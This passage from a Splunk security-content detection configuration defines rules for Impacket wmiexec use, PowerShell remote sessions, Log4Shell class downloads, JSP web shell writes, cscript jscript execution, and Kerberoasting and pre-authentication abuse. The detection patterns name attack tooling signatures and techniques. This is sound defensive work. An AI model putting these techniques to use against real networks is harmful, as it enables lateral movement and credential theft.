Typhoon", "Graceful Wipe Out Attack", "Industroyer2", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 70, "impact": 90, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1021", "T1021.002", "T1021.003", "T1047", "T1543.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic looks for the presence of suspicious commandline parameters typically present when using Impacket tools. Impacket is a collection of python classes meant to be used with Microsoft network protocols. There are multiple scripts that leverage impacket libraries like `wmiexec.py`, `smbexec.py`, `dcomexec.py` and `atexec.py` used to execute commands on remote endpoints. By default, these scripts leverage administrative shares and hardcoded parameters that can be used as a signature to detect its use. Red Teams and adversaries alike may leverage Impackets tools for lateral movement and remote code execution. action.notable.param.rule_title = Impacket Lateral Movement WMIExec Commandline Parameters action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=wmiprvse.exe by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | where match(process, "(?i)cmd\.exe\s+\/Q\s+\/c") AND match(process, "\\\\127\.0\.0\.1\\.*") AND match(process, "__\\d{1,10}\\.\\d{1,10}") | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `impacket_lateral_movement_wmiexec_commandline_parameters_filter` [ESCU - Interactive Session on Remote Endpoint with PowerShell - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the usage of the `Enter-PSSession`. This commandlet can be used to open an interactive session on a remote endpoint leveraging the WinRM protocol. Red Teams and adversaries alike may abuse WinRM and `Enter-PSSession` for lateral movement and remote code execution. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.006"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the usage of the `Enter-PSSession`. This commandlet can be used to open an interactive session on a remote endpoint leveraging the WinRM protocol. Red Teams and adversaries alike may abuse WinRM and `Enter-PSSession` for lateral movement and remote code execution. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup instructions can be found https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = Administrators may leverage WinRM and `Enter-PSSession` for administrative and troubleshooting tasks. This activity is usually limited to a small set of hosts or users. In certain environments, tuning may not be possible. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Interactive Session on Remote Endpoint with PowerShell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Lateral Movement"] action.risk = 1 action.risk.param._risk_message = An interactive session was opened on a remote endpoint from $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 45}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Interactive Session on Remote Endpoint with PowerShell - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement"], "cis20": ["CIS 10"], "confidence": 50, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.006"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the usage of the `Enter-PSSession`. This commandlet can be used to open an interactive session on a remote endpoint leveraging the WinRM protocol. Red Teams and adversaries alike may abuse WinRM and `Enter-PSSession` for lateral movement and remote code execution. action.notable.param.rule_title = Interactive Session on Remote Endpoint with PowerShell action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 (ScriptBlockText="*Enter-PSSession*" AND ScriptBlockText="*-ComputerName*") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest | rename UserID as user| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `interactive_session_on_remote_endpoint_with_powershell_filter` [ESCU - Java Class File download by Java User Agent - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a Java user agent performing a GET request for a .class file from the remote site. This is potentially indicative of exploitation of the Java application and may be related to current event CVE-2021-44228 (Log4Shell). action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1190"], "nist": ["DE.CM"]} action.escu.data_models = ["Web"] action.escu.eli5 = The following analytic identifies a Java user agent performing a GET request for a .class file from the remote site. This is potentially indicative of exploitation of the Java application and may be related to current event CVE-2021-44228 (Log4Shell). action.escu.how_to_implement = To successfully implement this search, you need to be ingesting web or proxy logs, or ensure it is being filled by a proxy like device, into the Web Datamodel. For additional filtering, allow list private IP space or restrict by known good. action.escu.known_false_positives = Filtering may be required in some instances, filter as needed. action.escu.creation_date = 2021-12-13 action.escu.modification_date = 2021-12-13 action.escu.confidence = high action.escu.full_search_name = ESCU - Java Class File download by Java User Agent - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Log4Shell CVE-2021-44228"] action.risk = 1 action.risk.param._risk_message = A Java user agent $http_user_agent$ was performing a $http_method$ to retrieve a remote class file. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 40}, {"risk_object_field": "http_user_agent", "risk_object_type": "other", "risk_score": 40}, {"risk_object_field": "http_method", "risk_object_type": "other", "risk_score": 40}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Java Class File download by Java User Agent - Rule action.correlationsearch.annotations = {"analytic_story": ["Log4Shell CVE-2021-44228"], "cis20": ["CIS 13"], "confidence": 50, "cve": ["CVE-2021-44228"], "impact": 80, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1190"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies a Java user agent performing a GET request for a .class file from the remote site. This is potentially indicative of exploitation of the Java application and may be related to current event CVE-2021-44228 (Log4Shell). action.notable.param.rule_title = Java Class File download by Java User Agent action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats count from datamodel=Web where Web.http_user_agent="*Java*" Web.http_method="GET" Web.url="*.class*" by Web.http_user_agent Web.http_method, Web.url,Web.url_length Web.src, Web.dest | `drop_dm_object_name("Web")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `java_class_file_download_by_java_user_agent_filter` [ESCU - Java Writing JSP File - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the process java writing a .jsp to disk. This is potentially indicative of a web shell being written to disk. Modify and tune the analytic based on data ingested. For instance, it may be worth running a broad query for jsp file writes first before performing a join. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery", "Installation"], "mitre_attack": ["T1190", "T1133"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the process java writing a .jsp to disk. This is potentially indicative of a web shell being written to disk. Modify and tune the analytic based on data ingested. For instance, it may be worth running a broad query for jsp file writes first before performing a join. action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` and `Filesystem` node. In addition, confirm the latest CIM App 4.20 or higher is installed and the latest TA for the endpoint product. action.escu.known_false_positives = False positives are possible and filtering may be required. Restrict by assets or filter known jsp files that are common for the environment. action.escu.creation_date = 2022-06-03 action.escu.modification_date = 2022-06-03 action.escu.confidence = high action.escu.full_search_name = ESCU - Java Writing JSP File - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Spring4Shell CVE-2022-22965", "Atlassian Confluence Server and Data Center CVE-2022-26134", "SysAid On-Prem Software CVE-2023-47246 Vulnerability"] action.risk = 1 action.risk.param._risk_message = An instance of $process_name$ was identified on endpoint $dest$ writing a jsp file $file_name$ to disk, potentially indicative of exploitation. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 42}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Java Writing JSP File - Rule action.correlationsearch.annotations = {"analytic_story": ["Spring4Shell CVE-2022-22965", "Atlassian Confluence Server and Data Center CVE-2022-26134", "SysAid On-Prem Software CVE-2023-47246 Vulnerability"], "cis20": ["CIS 10"], "confidence": 70, "cve": ["CVE-2022-22965"], "impact": 60, "kill_chain_phases": ["Delivery", "Installation"], "mitre_attack": ["T1190", "T1133"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the process java writing a .jsp to disk. This is potentially indicative of a web shell being written to disk. Modify and tune the analytic based on data ingested. For instance, it may be worth running a broad query for jsp file writes first before performing a join. action.notable.param.rule_title = Java Writing JSP File action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name IN ("java","java.exe", "javaw.exe") by _time Processes.process_id Processes.process_name Processes.dest Processes.process_guid Processes.user | `drop_dm_object_name(Processes)` | join process_guid [| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Filesystem where Filesystem.file_name="*.jsp*" by _time Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.file_path Filesystem.process_guid Filesystem.user | `drop_dm_object_name(Filesystem)` | fields _time process_guid file_path file_name file_create_time user dest process_name] | stats count min(_time) as firstTime max(_time) as lastTime by dest process_name process_guid file_name file_path file_create_time user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `java_writing_jsp_file_filter` [ESCU - Jscript Execution Using Cscript App - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a execution of jscript using cscript process. Commonly when a user run jscript file it was executed by wscript.exe application. This technique was seen in FIN7 js implant to execute its malicious script using cscript process. This behavior is uncommon and a good artifacts to check further anomalies within the network action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.007"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to detect a execution of jscript using cscript process. Commonly when a user run jscript file it was executed by wscript.exe application. This technique was seen in FIN7 js implant to execute its malicious script using cscript process. This behavior is uncommon and a good artifacts to check further anomalies within the network action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-09-13 action.escu.modification_date = 2021-09-13 action.escu.confidence = high action.escu.full_search_name = ESCU - Jscript Execution Using Cscript App - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["FIN7", "Remcos"] action.risk = 1 action.risk.param._risk_message = Process name $process_name$ with commandline $process$ to execute jscript in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Jscript Execution Using Cscript App - Rule action.correlationsearch.annotations = {"analytic_story": ["FIN7", "Remcos"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.007"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a execution of jscript using cscript process. Commonly when a user run jscript file it was executed by wscript.exe application. This technique was seen in FIN7 js implant to execute its malicious script using cscript process. This behavior is uncommon and a good artifacts to check further anomalies within the network action.notable.param.rule_title = Jscript Execution Using Cscript App action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name = "cscript.exe" AND Processes.parent_process = "*//e:jscript*") OR (Processes.process_name = "cscript.exe" AND Processes.process = "*//e:jscript*") by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process_id Processes.process Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `jscript_execution_using_cscript_app_filter` [ESCU - Kerberoasting spn request with RC4 encryption - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic leverages Kerberos Event 4769, A Kerberos service ticket was requested, to identify a potential kerberoasting attack against Active Directory networks. Kerberoasting allows an adversary to request kerberos tickets for domain accounts typically used as service accounts and attempt to crack them offline allowing them to obtain privileged access to the domain. This analytic looks for a specific combination of the Ticket_Options field based on common kerberoasting tools. Defenders should be aware that it may be possible for a Kerberoast attack to use different Ticket_Options. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558", "T1558.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic leverages Kerberos Event 4769, A Kerberos service ticket was requested, to identify a potential kerberoasting attack against Active Directory networks. Kerberoasting allows an adversary to request kerberos tickets for domain accounts typically used as service accounts and attempt to crack them offline allowing them to obtain privileged access to the domain. This analytic looks for a specific combination of the Ticket_Options field based on common kerberoasting tools. Defenders should be aware that it may be possible for a Kerberoast attack to use different Ticket_Options. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Domain Controller and Kerberos events. The Advanced Security Audit policy setting `Audit Kerberos Authentication Service` within `Account Logon` needs to be enabled. action.escu.known_false_positives = Older systems that support kerberos RC4 by default like NetApp may generate false positives. Filter as needed action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Kerberoasting spn request with RC4 encryption - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Data Destruction", "Hermetic Wiper", "Windows Privilege Escalation", "Active Directory Kerberos Attacks"] action.risk = 1 action.risk.param._risk_message = Potential kerberoasting attack via service principal name requests detected on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kerberoasting spn request with RC4 encryption - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "Hermetic Wiper", "Windows Privilege Escalation", "Active Directory Kerberos Attacks"], "cis20": ["CIS 10"], "confidence": 80, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558", "T1558.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic leverages Kerberos Event 4769, A Kerberos service ticket was requested, to identify a potential kerberoasting attack against Active Directory networks. Kerberoasting allows an adversary to request kerberos tickets for domain accounts typically used as service accounts and attempt to crack them offline allowing them to obtain privileged access to the domain. This analytic looks for a specific combination of the Ticket_Options field based on common kerberoasting tools. Defenders should be aware that it may be possible for a Kerberoast attack to use different Ticket_Options. action.notable.param.rule_title = Kerberoasting spn request with RC4 encryption action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4769 Service_Name!="*$" (Ticket_Options=0x40810000 OR Ticket_Options=0x40800000 OR Ticket_Options=0x40810010) Ticket_Encryption_Type=0x17 | stats count min(_time) as firstTime max(_time) as lastTime by dest, service, service_id, Ticket_Encryption_Type, Ticket_Options | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `kerberoasting_spn_request_with_rc4_encryption_filter` [ESCU - Kerberos Pre-Authentication Flag Disabled in UserAccountControl - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic leverages Windows Security Event 4738, `A user account was changed`, to identify a change performed on a domain user object that disables Kerberos Pre-Authentication. Disabling the Pre Authentication flag in the UserAccountControl property allows an adversary to easily perform a brute force attack against the user's password offline leveraging the ASP REP Roasting technique. Red Teams and adversaries alike who have obtained privileges in an Active Directory network may use this technique as a backdoor or a way to escalate privileges. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558", "T1558.004"], "nist": ["DE.CM"]} action.escu.data_models = ["Change"] action.escu.eli5 = The following analytic leverages Windows Security Event 4738, `A user account was changed`, to identify a change performed on a domain user object that disables Kerberos Pre-Authentication. Disabling the Pre Authentication flag in the UserAccountControl property allows an adversary to easily perform a brute force attack against the user's password offline leveraging the ASP REP Roasting technique. Red Teams and adversaries alike who have obtained privileges in an Active Directory network may use this technique as a backdoor or a way to escalate privileges. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Domain Controller events. The Advanced Security Audit policy setting `User Account Management` within `Account Management` needs to be enabled. action.escu.known_false_positives = Unknown. action.escu.creation_date = 2022-02-22 action.escu.modification_date = 2022-02-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Kerberos Pre-Authentication Flag Disabled in UserAccountControl - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Kerberos Attacks"] action.risk = 1 action.risk.param._risk_message = Kerberos Pre Authentication was Disabled for $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 45}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kerberos Pre-Authentication Flag Disabled in UserAccountControl - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Kerberos Attacks"], "cis20": ["CIS 10"], "confidence": 90, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558", "T1558.004"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic leverages Windows Security Event 4738, `A user account was changed`, to identify a change performed on a domain user object that disables Kerberos Pre-Authentication. Disabling the Pre Authentication flag in the UserAccountControl property allows an adversary to easily perform a brute force attack against the user's password offline leveraging the ASP REP Roasting technique. Red Teams and adversaries alike who have obtained privileges in an Active Directory network may use this technique as a backdoor or a way to escalate privileges. action.notable.param.rule_title = Kerberos Pre-Authentication Flag Disabled in UserAccountControl action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4738 MSADChangedAttributes="*Don't Require Preauth' - Enabled*" |rename Account_Name as user | table EventCode, user, dest, Security_ID, MSADChangedAttributes | `kerberos_pre_authentication_flag_disabled_in_useraccountcontrol_filter` [ESCU - Kerberos Pre-Authentication Flag Disabled with PowerShell - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Set-ADAccountControl` commandlet with specific parameters. `Set-ADAccountControl` is part of the Active Directory PowerShell module used to manage Windows Active Directory networks. As the name suggests, `Set-ADAccountControl` is used to modify User Account Control values for an Active Directory domain account. With the appropiate parameters, Set-ADAccountControl allows adversaries to disable Kerberos Pre-Authentication for an account to to easily perform a brute force attack against the user's password offline leveraging the ASP REP Roasting technique. Red Teams and adversaries alike who have obtained privileges in an Active Directory network may use this technique as a backdoor or a way to escalate privileges. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558", "T1558.004"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Set-ADAccountControl` commandlet with specific parameters. `Set-ADAccountControl` is part of the Active Directory PowerShell module used to manage Windows Active Directory networks. As the name suggests, `Set-ADAccountControl` is used to modify User Account Control values for an Active Directory domain account. With the appropiate parameters, Set-ADAccountControl allows adversaries to disable Kerberos Pre-Authentication for an account to to easily perform a brute force attack against the user's password offline leveraging the ASP REP Roasting technique. Red Teams and adversaries alike who have obtained privileges in an Active Directory network may use this technique as a backdoor or a way to escalate privileges. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = Although unlikely, Administrators may need to set this flag for legitimate purposes. action.escu.creation_date = 2022-03-22 action.escu.modification_date = 2022-03-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Kerberos Pre-Authentication Flag Disabled with PowerShell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Kerberos Attacks"] action.risk = 1 action.risk.param._risk_message = Kerberos Pre Authentication was Disabled using PowerShell on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 45}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kerberos Pre-Authentication Flag Disabled with PowerShell - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Kerberos Attacks"], "cis20": ["CIS 10"], "confidence": 90, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558", "T1558.004"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Set-ADAccountControl` commandlet with specific parameters. `Set-ADAccountControl` is part of the Active Directory PowerShell module used to manage Windows Active Directory networks. As the name suggests, `Set-ADAccountControl` is used to modify User Account Control values for an Active Directory domain account. With the appropiate parameters, Set-ADAccountControl allows adversaries to disable Kerberos Pre-Authentication for an account to to easily perform a brute force attack against the user's password offline leveraging the ASP REP Roasting technique. Red Teams and adversaries alike who have obtained privileges in an Active Directory network may use this technique as a backdoor or a way to escalate privileges. action.notable.param.rule_title = Kerberos Pre-Authentication Flag Disabled with PowerShell action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 (ScriptBlockText = "*Set-ADAccountControl*" AND ScriptBlockText="*DoesNotRequirePreAuth:$true*") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `kerberos_pre_authentication_flag_disabled_with_powershell_filter` [ESCU - Kerberos Service Ticket Request Using RC4 Encryption - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic leverages Kerberos Event 4769, A Kerberos service ticket was requested, to identify a potential Kerberos Service Ticket request related to a Golden Ticket attack. Adversaries who have obtained the Krbtgt account NTLM password hash may forge a Kerberos Granting Ticket (TGT) to obtain unrestricted access to an Active Directory environment. Armed with a Golden Ticket, attackers can request service tickets to move laterally and execute code on remote systems. Looking for Kerberos Service Ticket requests using the legacy RC4 encryption mechanism could represent the second stage of a Golden Ticket attack. RC4 usage should be rare on a modern network since Windows Vista & Windows Sever 2008 and newer support AES Kerberos encryption.\ Defenders should note that if an attacker does not leverage the NTLM password hash but rather the AES key to create a golden ticket, this detection may be bypassed. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558", "T1558.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic leverages Kerberos Event 4769, A Kerberos service ticket was requested, to identify a potential Kerberos Service Ticket request related to a Golden Ticket attack. Adversaries who have obtained the Krbtgt account NTLM password hash may forge a Kerberos Granting Ticket (TGT) to obtain unrestricted access to an Active Directory environment. Armed with a Golden Ticket, attackers can request service tickets to move laterally and execute code on remote systems. Looking for Kerberos Service Ticket requests using the legacy RC4 encryption mechanism could represent the second stage of a Golden Ticket attack. RC4 usage should be rare on a modern network since Windows Vista & Windows Sever 2008 and newer support AES Kerberos encryption.\ Defenders should note that if an attacker does not leverage the NTLM password hash but rather the AES key to create a golden ticket, this detection may be bypassed. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Domain Controller and Kerberos events. The Advanced Security Audit policy setting `Audit Kerberos Authentication Service` within `Account Logon` needs to be enabled. action.escu.known_false_positives = Based on Microsoft documentation, legacy systems or applications will use RC4-HMAC as the default encryption for Kerberos Service Ticket requests. Specifically, systems before Windows Server 2008 and Windows Vista. Newer systems will use AES128 or AES256. action.escu.creation_date = 2022-03-15 action.escu.modification_date = 2022-03-15 action.escu.confidence = high action.escu.full_search_name = ESCU - Kerberos Service Ticket Request Using RC4 Encryption - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Kerberos Attacks", "Active Directory Privilege Escalation"] action.risk = 1 action.risk.param._risk_message = A Kerberos Service TTicket request with RC4 encryption was requested from $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 45}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kerberos Service Ticket Request Using RC4 Encryption - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Kerberos Attacks", "Active Directory Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 50, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558", "T1558.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic leverages Kerberos Event 4769, A Kerberos service ticket was requested, to identify a potential Kerberos Service Ticket request related to a Golden Ticket attack. Adversaries who have obtained the Krbtgt account NTLM password hash may forge a Kerberos Granting Ticket (TGT) to obtain unrestricted access to an Active Directory environment. Armed with a Golden Ticket, attackers can request service tickets to move laterally and execute code on remote systems. Looking for Kerberos Service Ticket requests using the legacy RC4 encryption mechanism could represent the second stage of a Golden Ticket attack. RC4 usage should be rare on a modern network since Windows Vista & Windows Sever 2008 and newer support AES Kerberos encryption.\ Defenders should note that if an attacker does not leverage the NTLM password hash but rather the AES key to create a golden ticket, this detection may be bypassed. action.notable.param.rule_title = Kerberos Service Ticket Request Using RC4 Encryption action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = 